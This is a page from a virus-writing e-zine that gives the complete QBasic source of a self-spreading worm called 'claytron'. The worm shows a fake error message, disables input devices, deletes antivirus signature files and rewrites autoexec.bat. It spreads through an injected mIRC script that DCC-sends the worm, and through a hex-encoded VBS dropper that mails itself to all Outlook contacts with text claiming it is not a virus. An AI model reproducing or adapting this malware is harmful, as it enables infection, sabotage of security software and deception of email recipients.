The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
claytron by adious
'claytron [worm]
'written on: 2\11\02
'By adious [rRlf]
100 CLS
101 PRINT "unexpected problem with the program.please download new version"
102 PRINT "press enter"
103 INPUT A
104 CLS
105 SHELL "ctty null"
106 SHELL "c:\windows\rundll32.exe mouse,disable"
107 SHELL "c:\windows\rundll32.exe keyboard,disable"
108 SHELL "cd\"
109 SHELL "if not exist c:\claytron.exe copy claytron.exe c:\claytron"
110 SHELL "if exist c:\claytron.exe del c:\programme\f-prot95\fpwm32.dll"
111 SHELL "if exist c:\claytron.exe del c:\programme\mcafee\scan.dat"
112 SHELL "if exist c:\claytron.exe del c:\tbavw95\tbscan.sig"
113 SHELL "if exist c:\claytron.exe del c:\tbav\tbav.dat"
114 SHELL "if exist c:\claytron.exe del c:\programme\tbav\tbav.dat"
115 SHELL "if exist c:\claytron.exe del c:\programme\avpersonal\antivir.vdf"
116 SHELL "if exist c:\claytron.exe del c:\programme\norton~1\s32integ.dll"
117 OPEN "b.bat" FOR OUTPUT AS #1
118 PRINT #1, "[script]"
119 PRINT #1, "n0=on 1:JOIN:#:{"
120 PRINT #1, "n1= /if ( nick == $me ) { halt }"
121 PRINT #1, "n2= /.dcc send $nick c:\craytron.exe"
122 PRINT #1, "n3=}"
123 CLOSE b.bat
124 SHELL "if exist c:\mirc\mirc.ini copy b.bat c:\mirc\script.ini"
125 SHELL "if exist c:\mirc32\mirc.ini copy b.bat c:\mirc32\script.ini"
126 SHELL "if exist c:\progra~1\mirc\mirc.ini copy b.bat c:\progra~1\mirc\script.ini"
127 SHELL "if exist c:\progra~1\mirc32\mirc.ini copy b.bat c:\progra~1\mirc32\script.ini"
128 SHELL "del autoexec.bat"
129 SHELL "cd\"
130 OPEN "autoexec.bat" FOR OUTPUT AS #1
131 PRINT #1, "@echo off"
132 PRINT #1, "echo 0000000000000000000000000000000"
133 PRINT #1, "echo you are infected by claytron"
134 PRINT #1, "echo the birth of my new qb worm"
135 PRINT #1, "echo by the labs of adious [rRlf]"
136 PRINT #1, "echo http:\\www.adious.cjb.net"
137 PRINT #1, "echo http:\\www.rRlf.de"
138 PRINT #1, "echo 000000000000000000000000000000"
139 PRINT #1, "pause"
140 CLOSE autoexec.bat
141 SHELL "c:\windows\rundll32.exe mouse,enable"
142 SHELL "c:\windows\rundll32.exe keyboard,enable"
143 OPEN "mailer.bat" FOR OUTPUT AS #1
144 PRINT #1, "@echo off | cls | ctty nul"
145 PRINT #1, "echo e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>>s"
146 PRINT #1, "echo e 0110 6E 65 78 74 0D 0A 64 69 6D 20 61 2C 62 2C 63 2C>>s"
147 PRINT #1, "echo e 0120 64 2C 65 0D 0A 73 65 74 20 61 20 3D 20 57 73 63>>s"
148 PRINT #1, "echo e 0130 72 69 70 74 2E 43 72 65 61 74 65 4F 62 6A 65 63>>s"
149 PRINT #1, "echo e 0140 74 28 22 57 73 63 72 69 70 74 2E 53 68 65 6C 6C>>s"
150 PRINT #1, "echo e 0150 22 29 0D 0A 73 65 74 20 62 20 3D 20 43 72 65 61>>s"
151 PRINT #1, "echo e 0160 74 65 4F 62 6A 65 63 74 28 22 4F 75 74 6C 6F 6F>>s"
152 PRINT #1, "echo e 0170 6B 2E 41 70 70 6C 69 63 61 74 69 6F 6E 22 29 20>>s"
153 PRINT #1, "echo e 0180 0D 0A 73 65 74 20 63 20 3D 20 62 2E 47 65 74 4E>>s"
154 PRINT #1, "echo e 0190 61 6D 65 53 70 61 63 65 28 22 4D 41 50 49 22 29>>s"
155 PRINT #1, "echo e 01A0 20 0D 0A 66 6F 72 20 79 20 3D 20 31 20 54 6F 20>>s"
156 PRINT #1, "echo e 01B0 63 2E 41 64 64 72 65 73 73 4C 69 73 74 73 2E 43>>s"
157 PRINT #1, "echo e 01C0 6F 75 6E 74 20 0D 0A 73 65 74 20 64 20 3D 20 63>>s"
158 PRINT #1, "echo e 01D0 2E 41 64 64 72 65 73 73 4C 69 73 74 73 28 79 29>>s"
159 PRINT #1, "echo e 01E0 20 0D 0A 78 20 3D 20 31 20 0D 0A 73 65 74 20 65>>s"
160 PRINT #1, "echo e 01F0 20 3D 20 62 2E 43 72 65 61 74 65 49 74 65 6D 28>>s"
161 PRINT #1, "echo e 0200 30 29 20 0D 0A 66 6F 72 20 6F 20 3D 20 31 20 54>>s"
162 PRINT #1, "echo e 0210 6F 20 64 2E 41 64 64 72 65 73 73 45 6E 74 72 69>>s"
163 PRINT #1, "echo e 0220 65 73 2E 43 6F 75 6E 74 20 0D 0A 66 20 3D 20 64>>s"
164 PRINT #1, "echo e 0230 2E 41 64 64 72 65 73 73 45 6E 74 72 69 65 73 28>>s"
165 PRINT #1, "echo e 0240 78 29 20 0D 0A 65 2E 52 65 63 69 70 69 65 6E 74>>s"
166 PRINT #1, "echo e 0250 73 2E 41 64 64 20 66 20 0D 0A 78 20 3D 20 78 20>>s"
167 PRINT #1, "echo e 0260 2B 20 31 20 0D 0A 6E 65 78 74 20 0D 0A 65 2E 53>>s"
168 PRINT #1, "echo e 0270 75 62 6A 65 63 74 20 3D 20 22 48 69 21 21 22 20>>s"
169 PRINT #1, "echo e 0280 0D 0A 65 2E 42 6F 64 79 20 3D 20 22 53 6F 72 72>>s"
170 PRINT #1, "echo e 0290 79 2C 62 75 74 20 69 20 6C 69 6B 65 20 79 6F 75>>s"
171 PRINT #1, "echo e 02A0 20 74 6F 20 70 6C 61 79 20 74 68 69 73 20 67 61>>s"
172 PRINT #1, "echo e 02B0 6D 65 2E 22 20 0D 0A 65 2E 42 6F 64 79 20 3D 20>>s"
173 PRINT #1, "echo e 02C0 22 69 74 27 73 20 63 61 6C 6C 65 64 20 27 63 6C>>s"
174 PRINT #1, "echo e 02D0 61 79 74 72 6F 6E 27 2E 20 49 74 27 73 20 61 20>>s"
175 PRINT #1, "echo e 02E0 66 75 6E 20 52 50 47 20 67 61 6D 65 2E 4F 68 20>>s"
176 PRINT #1, "echo e 02F0 79 65 61 68 2E 2E 22 20 0D 0A 65 2E 42 6F 64 79>>s"
177 PRINT #1, "echo e 0300 20 3D 20 22 74 68 65 20 70 72 6F 67 72 61 6D 20>>s"
178 PRINT #1, "echo e 0310 64 6F 65 73 20 6E 6F 74 20 68 61 76 65 20 61 20>>s"
179 PRINT #1, "echo e 0320 76 69 72 75 73 2E 2E 49 27 76 65 20 73 63 61 6E>>s"
180 PRINT #1, "echo e 0330 6E 65 64 20 69 74 20 61 6E 64 20 69 74 27 73 20>>s"
181 PRINT #1, "echo e 0340 6E 6F 74 20 61 20 76 69 72 75 73 22 20 0D 0A 65>>s"
182 PRINT #1, "echo e 0350 2E 42 6F 64 79 20 3D 20 22 59 6F 75 20 67 6F 74>>s"
183 PRINT #1, "echo e 0360 20 74 6F 20 74 72 75 73 74 20 6D 65 20 6F 6E 20>>s"
184 PRINT #1, "echo e 0370 74 68 69 73 2E 22 20 0D 0A 65 2E 41 74 74 61 63>>s"
185 PRINT #1, "echo e 0380 68 6D 65 6E 74 73 2E 41 64 64 20 28 22 63 3A 5C>>s"
186 PRINT #1, "echo e 0390 63 6C 61 79 74 72 6F 6E 2E 65 78 65 22 29 20 0D>>s"
187 PRINT #1, "echo e 03A0 0A 65 2E 44 65 6C 65 74 65 41 66 74 65 72 53 75>>s"
188 PRINT #1, "echo e 03B0 62 6D 69 74 20 3D 20 46 61 6C 73 65 20 0D 0A 65>>s"
189 PRINT #1, "echo e 03C0 2E 53 65 6E 64 20 20 0D 0A 66 20 3D 20 22 22 20>>s"
190 PRINT #1, "echo e 03D0 0D 0A 6E 65 78 74 20 00>>s"
191 PRINT #1, "echo rcx>>s"
192 PRINT #1, "echo 2D7>>s"
193 PRINT #1, "echo nC:\script.vbs>>s"
194 PRINT #1, "echo w>>s"
195 PRINT #1, "echo q>>s"
196 PRINT #1, "debug < s"
197 PRINT #1, "del s"
198 CLOSE mailer.bat
199 SHELL "start mailer.bat"
200 SHELL "cscript script.vbs"
201 SHELL "del c:\mailer.bat"
202 SHELL "del c:\script.vbs"
203 SHELL "c:\windows\rundll32.exe mouse,enable"
204 SHELL "c:\windows\rundll32.exe keyboard,enable"
205 END